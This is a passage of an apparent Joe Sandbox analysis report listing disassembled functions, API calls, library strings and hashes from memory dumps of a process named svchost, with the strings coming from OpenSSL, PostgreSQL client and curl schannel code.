                          • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332F97
                          • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332FA8
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3332FE7
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA3333012
                          • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3343D8B,00000000,00007FFDA332ABE9,?,?,?,?,?,00007FFDA332AB6E), ref: 00007FFDA333303B
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_run_once$R_newR_set_debugR_set_error
                          • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                          • API String ID: 3879570137-538246785
                          • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                          • Instruction ID: 95601269a0b782d2643d91e9fb3c1ebd4eb6f7769c5eb4c9ffeb5b5e8d767b90
                          • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                          • Instruction Fuzzy Hash: 5A314361F0E90386FB44B715E8717B56293EF94380F549435E80EA23A7DE2FE945C708
                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362544062.00007FFD94241000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94240000, based on PE: true
                          • Associated: 00000035.00000002.3362523626.00007FFD94240000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362605186.00007FFD94303000.00000002.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362698877.00007FFD9445A000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362719340.00007FFD9445D000.00000008.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362740573.00007FFD9445E000.00000004.00000001.01000000.0000000B.sdmp
                          • Associated: 00000035.00000002.3362762637.00007FFD94462000.00000002.00000001.01000000.0000000B.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffd94240000_svchost.jbxd
                          Similarity
                          • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                          • String ID:
                          • API String ID: 1617910340-0
                          • Opcode ID: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                          • Instruction ID: 014432d100be14540e4ba3cd63f2f9e14527c07d8ec5f807e8a363f86072f3d2
                          • Opcode Fuzzy Hash: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                          • Instruction Fuzzy Hash: 83C19132B28A4186EB60DFA4C4A02AC3771FB8AB94F509325DE1E97796DF39E451C700
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_free$O_mallocR_newR_set_debug
                          • String ID: ssl\record\methods\tls_common.c$tls_setup_write_buffer
                          • API String ID: 681801835-438346174
                          • Opcode ID: 468ba72a43a4c0d3d1ca5aa109d9efe1429000385757ab171fc09a78996c4a09
                          • Instruction ID: efa0a2c42c60e8f362346632f8aa1f2dfbcc67b536a09cc69601528fa16deee5
                          • Opcode Fuzzy Hash: 468ba72a43a4c0d3d1ca5aa109d9efe1429000385757ab171fc09a78996c4a09
                          • Instruction Fuzzy Hash: D951D232F0EF5187EB10BF51E9502A963A6FB44B88F180431DE4D27B86DE3AE656C304
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: O_zalloc$O_free
                          • String ID: ssl\ssl_cert.c
                          • API String ID: 1411191933-188639428
                          • Opcode ID: dfaeb06e57066b1833371b19c771e489e53a8360702d172523822accf1e30447
                          • Instruction ID: 337031528b21b9107ceea3c6b4e74e629b22e2a2b188805b9d70808122716578
                          • Opcode Fuzzy Hash: dfaeb06e57066b1833371b19c771e489e53a8360702d172523822accf1e30447
                          • Instruction Fuzzy Hash: 1A115872B1AB4285EB81EF15E4643A832A1FB08784F484035CA4D0739AEF7EE594C709
                          APIs
                          • CRYPTO_free_ex_data.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA333738E
                          • CRYPTO_THREAD_lock_free.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA33373AF
                          • CRYPTO_free.LIBCRYPTO-3-X64(?,00007FFDA3367F02,?,00007FFDA3363609), ref: 00007FFDA33373C4
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: D_lock_freeO_freeO_free_ex_data
                          • String ID: ssl\ssl_lib.c
                          • API String ID: 1442806380-1984206432
                          • Opcode ID: 68dbc8c7bb9ebcc90587d23e049a21a5d4f55a4649e8addeef594cf45cb7a532
                          • Instruction ID: e53b1d9b3d647847fd19ac105a22ec5578698dc221cc53119958fdd5823e36b9
                          • Opcode Fuzzy Hash: 68dbc8c7bb9ebcc90587d23e049a21a5d4f55a4649e8addeef594cf45cb7a532
                          • Instruction Fuzzy Hash: DEF06261F0FE4242EA58BB7998711781312EF44B60F045535ED0E563E3DE2FD8418288

                          Control-flow Graph

                          APIs
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: free
                          • String ID:
                          • API String ID: 1294909896-0
                          • Opcode ID: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                          • Instruction ID: 0e6299b46625afe97c53203d844f0ba837f0b47103a1ebb996a4405c663eb250
                          • Opcode Fuzzy Hash: 9186718d952aa99ffdd076691540635cd7a8686958ebc2398125b42f5949b570
                          • Instruction Fuzzy Hash: 46A14636A1AA8596EB809F21D8642BD3721FB8DF95F080731CE4E57366CF39D499C314

                          Control-flow Graph

                          APIs
                          • ERR_new.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B14
                          • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B2C
                          • ERR_set_error.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B3D
                          • OSSL_PARAM_construct_uint64.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381B59
                          • OSSL_PARAM_construct_uint64.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381BC4
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381BFD
                          • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381C6D
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381CE9
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381D2C
                          • OSSL_PARAM_construct_int.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381D62
                          • OSSL_PARAM_construct_uint32.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381DC9
                          • OSSL_PARAM_construct_uint32.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381E35
                          • OSSL_PARAM_construct_end.LIBCRYPTO-3-X64(00000000,00000000,?,?,000004A0,0001FFFF,?,00000001,00000001,00007FFDA338009E,?,00000000,000004A0), ref: 00007FFDA3381E5A
                          • BIO_s_dgram_mem.LIBCRYPTO-3-X64 ref: 00007FFDA3381ECD
                          • BIO_new.LIBCRYPTO-3-X64 ref: 00007FFDA3381EDC
                          • BIO_free.LIBCRYPTO-3-X64 ref: 00007FFDA33820C0
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA33820EC
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA3382104
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382114
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA338212C
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382141
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382195
                          • ERR_new.LIBCRYPTO-3-X64 ref: 00007FFDA3382222
                          • ERR_set_debug.LIBCRYPTO-3-X64 ref: 00007FFDA338223A
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$M_construct_intR_set_debug$M_construct_endM_construct_uint32M_construct_uint64$O_freeO_newO_s_dgram_memR_set_error
                          • String ID: block_padding$max_early_data$max_frag_len$mode$options$read_ahead$read_buffer_len$ssl\record\rec_layer_s3.c$ssl_set_new_record_layer$stream_mac$tlstree$use_etm
                          • API String ID: 3782620925-1760797909
                          • Opcode ID: 26df34efff16ab7e7fd55ff4b810bd16375307e5f442621eda72973cbc762beb
                          • Instruction ID: 1a7ec0a3ff59d5ab2b9725584d70bcbf19e0cee66fc7f441b3024ad992553638
                          • Opcode Fuzzy Hash: 26df34efff16ab7e7fd55ff4b810bd16375307e5f442621eda72973cbc762beb
                          • Instruction Fuzzy Hash: 4E424B22E0DF8686E761AF68D8503E933A2FB58748F048235DE4D67756DF39E185C304

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_strdupfreesocket
                          • String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
                          • API String ID: 3112834638-675630034
                          • Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                          • Instruction ID: 10d9b88d13d07858b09010664e8736444a4aa6b3ae2df3a926f3c76696f85c3f
                          • Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
                          • Instruction Fuzzy Hash: 0CF1C222B0EA8282F7908F25D4602BC37A2FB45B84F445231EE4E67396DF7EE585C754

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3360027676.0000000068281000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68280000, based on PE: true
                          • Associated: 00000035.00000002.3360005479.0000000068280000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360061025.0000000068296000.00000004.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360094548.0000000068297000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360130835.00000000682A0000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360164781.00000000682A1000.00000004.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360185514.00000000682A4000.00000008.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360206133.00000000682A5000.00000002.00000001.01000000.0000000F.sdmp
                          • Associated: 00000035.00000002.3360206133.00000000682EC000.00000002.00000001.01000000.0000000F.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_68280000_svchost.jbxd
                          Similarity
                          • API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
                          • String ID: 8`)h$pq)h
                          • API String ID: 1031399696-283867673
                          • Opcode ID: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                          • Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
                          • Opcode Fuzzy Hash: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
                          • Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
                          • String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
                          • API String ID: 3976168012-2457897468
                          • Opcode ID: c93c3c927744f5f9d2a6a3cae3ab13af74bb0be487adeff1de5b1b43d936940d
                          • Instruction ID: 00dce510da0ec8c968f2f3f0f699c6cb4b14ace7bc6beb741b0ecbd25062646e
                          • Opcode Fuzzy Hash: c93c3c927744f5f9d2a6a3cae3ab13af74bb0be487adeff1de5b1b43d936940d
                          • Instruction Fuzzy Hash: D512CD22B0AA8686E7518F25D4603FC3762FB58B88F445231EE4E37396DF7AE185C744

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_newR_set_debug$ErrorLastM_freeR_clear_errorR_set_error
                          • String ID: ssl\statem\statem.c$state_machine
                          • API String ID: 2605663294-1334640251
                          • Opcode ID: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                          • Instruction ID: 897b49dc54704a9d47af2fc3963d678d8a223e08e7b90a77f093a1b088a2079a
                          • Opcode Fuzzy Hash: 48b027c2e20d56dac79a9c5c64ffc6497de1d13581ba5d05f39c203f3311fe2a
                          • Instruction Fuzzy Hash: 5AC19031B0EA42C6FB64BB25C4713B92296EF84B44F180835DA0D6A7C7DF7FE8458619
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                          • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                          • API String ID: 726578228-413892695
                          • Opcode ID: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                          • Instruction ID: 262aed78e39b0fd3d9bd7c09d2254a5bcaff3adb8dada893c6076c82ffb88731
                          • Opcode Fuzzy Hash: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                          • Instruction Fuzzy Hash: 1A02937AB0A7CA86EB62CF15E4643A967A0FB46F84F404035DA4E87796DF7CE450CB04
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362954598.00007FFDA3771000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA3770000, based on PE: true
                          • Associated: 00000035.00000002.3362935112.00007FFDA3770000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3362982850.00007FFDA3798000.00000002.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363010077.00007FFDA37BE000.00000004.00000001.01000000.0000000D.sdmp
                          • Associated: 00000035.00000002.3363028789.00007FFDA37BF000.00000002.00000001.01000000.0000000D.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3770000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLastR_get_error$E_finishE_freeL_get_errorR_clear_errorS_methodX509_freeX_newfree
                          • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$SSL error: %s$SSL error: certificate verify failed: %s$TLSv1$TLSv1.3$This may indicate that the server does not support any SSL protocol version between %s and %s.$certificate could not be obtained: %s$out of memory allocating error description$system$unrecognized SSL error code: %d
                          • API String ID: 2649262036-2362506927
                          • Opcode ID: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                          • Instruction ID: 474e28b7def8482defd8dea96d702a6131d2226ddf9f9b4d3b171a9dd7deab46
                          • Opcode Fuzzy Hash: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                          • Instruction Fuzzy Hash: 6081BF21F0A64352FA99AB3594352B936C3AF46B86F080535D90F763D7EE2EE480835C
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ErrorLast_errno
                          • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                          • API String ID: 3939687465-2168394622
                          • Opcode ID: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                          • Instruction ID: ba4f6760bf99cc680141456d21f5fe94822fac61c24bc6d44181a852ad39880b
                          • Opcode Fuzzy Hash: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                          • Instruction Fuzzy Hash: F25182AEB0E54E85EE278F05E4A83B92661BF46FD4F9A0031D90D02393EF2CF555D208
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3363156384.00007FFDA5571000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA5570000, based on PE: true
                          • Associated: 00000035.00000002.3363135598.00007FFDA5570000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363197904.00007FFDA55D7000.00000002.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363222362.00007FFDA55F2000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363241939.00007FFDA55F3000.00000008.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363263205.00007FFDA55F4000.00000004.00000001.01000000.0000000C.sdmp
                          • Associated: 00000035.00000002.3363284417.00007FFDA55F6000.00000002.00000001.01000000.0000000C.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda5570000_svchost.jbxd
                          Similarity
                          • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                          • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                          • API String ID: 3185706071-3097429119
                          • Opcode ID: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                          • Instruction ID: 2ecfd72b40392f3b3606a90d3fef53b6739a325a3782c4bf5ed78b20d071fdd3
                          • Opcode Fuzzy Hash: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                          • Instruction Fuzzy Hash: D5C16A3AB0A74986EB12DF21E8603AE27A4FB46B88F404036DA5D07B57DF3CE555C708
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000035.00000002.3362804085.00007FFDA3321000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA3320000, based on PE: true
                          • Associated: 00000035.00000002.3362784654.00007FFDA3320000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362856525.00007FFDA33B0000.00000002.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362885902.00007FFDA33DD000.00000004.00000001.01000000.0000000E.sdmp
                          • Associated: 00000035.00000002.3362912098.00007FFDA33E1000.00000002.00000001.01000000.0000000E.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_53_2_7ffda3320000_svchost.jbxd
                          Similarity
                          • API ID: R_new$R_set_debug$X_get0_cipher$D_get_sizeP_compress_blockR_vset_errormemset
                          • String ID: ssl\record\methods\tls_common.c$tls_write_records_default
                          • API String ID: 909859927-3970931601
                          • Opcode ID: 1151bc5a76b257bebab38f2b3411b41006c6163fbd03b349323ada81ee6bbd9b
                          • Instruction ID: 33c5a250ff4258ef3e482e52a3df49cb2dde3292d18d15bcdfedc12415163591
